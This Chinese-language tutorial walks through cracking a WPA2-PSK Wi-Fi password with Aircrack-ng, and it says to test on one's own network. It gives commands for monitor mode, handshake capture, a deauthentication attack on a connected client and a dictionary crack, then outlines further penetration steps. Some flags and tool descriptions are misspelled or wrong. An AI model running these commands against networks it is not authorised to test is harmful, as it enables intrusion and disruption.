本文内容:
- Aircrack-ng简介
- WIFI破解配置要求
- WIFI破解的流程
- 扩展思路如何继续渗透测试
1,Aircrack-ng简介:
Aircrack-ng是一个与802.11标准[无线网络标准]的无线网络分析有关的安全软件,主要功能:网络侦测,数据包嗅探,WEB和WPA/WPA2-PS破解。
Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。
可以在Linux和Windows上运行。
开源项目:https://github.com/aircrack-ng/aircrack-ng
官网:https://www.aircrack-ng.org/
官方指南:https://www.aircrack-ng.org/doku.php
教程:https://www.aircrack-ng.org/~~V/doku.php?id=tutorial
aircrack-ng套件包含有:
aircrack-ng 破解wep以及wpa[字典攻击]秘钥
airdecap-ng 通过已知秘钥来解密web或wpa嗅探数据
airmon-ng 将网卡设置为监听模式
aireplay-ng 数据包嗅探:将无线网络数据输送到PCAP货IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
2,WIFI破解配置要求:
1.自建WIFI进行测试。
2.外置网卡设备[RT3070]:可以自己买个,不需要多好十几块钱就可以。
3.信号稳定
3,WIFI破解的流程:
Aircrak-ng破解WAP2-PSK:
1.查看网卡设备:
命令:ifconfig / iwconfig
2.查看是否支持监听模式:
命令:airmon-ng
3.开启无线网卡监控模式
命令:airmon-ng start wlan() 通过查看,wlan0多了一个mon,证明开启成功
4.查看周围WIFI网络:
命令:airodump-ng wlan0mon
5.监听目标网络的握手包:
命令:airodump-ng -c 11 --bassid 2C:57:31:60:27:E6 -w ~/1/ wlan0mon
参数解释:ESSID:为WIFI名字。
-c 指定频道[信道]号 CH:信道
-bassid 指定路由器bassid MAC地址
-w 指定抓取的数据包保存位置 1:文件名
wlan0mon 开启
如果没有[WPA handshake:MAC地址],就可以强制让它断开,重新连接,看是否能抓到数据包
6.强制对方WIFI断开重连[获取握手包]
命令:aireplay-ng -0 2 -a 2C:57:31:60:27:E6 -c 60:AB:67:F2:F5:A8 wlan0mon
参数解释:
-0 表示发起[鉴权] deauthentication攻击 2 为鉴权等级。
-a 指定无线路由器[开启wifi设备的MAC地址]BSSID
-c 指定强制断开的设备[链接wifi设备的MAC地址]
wlan0mon 开启
7.破解握手包密码:
命令:aircrack-ng -a2 -b 52:8F:4C:67:B1:91 -w pass.txt ~/1/*.cap
参数解释:
-a2 代表WPA的握手包
-b 指定要破解的WIFI[MAC地址] BSSID
-w 指定字典文件
8.关闭监听模式:
命令:airmon-ng stop wlan0mon
破解密码链接之前要关闭监听模式
4,扩展思路如何继续渗透测试:
WIFI密码后的扩展思路:
想想我们的渗透测试思路:
1.信息收集
2.漏洞扫描
3.漏洞利用
4.获取权限
5.权限维持
6.整理思路